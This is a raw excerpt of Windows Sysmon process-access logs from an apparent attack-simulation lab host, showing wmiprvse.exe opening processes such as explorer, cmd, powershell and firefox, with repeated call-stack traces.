1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\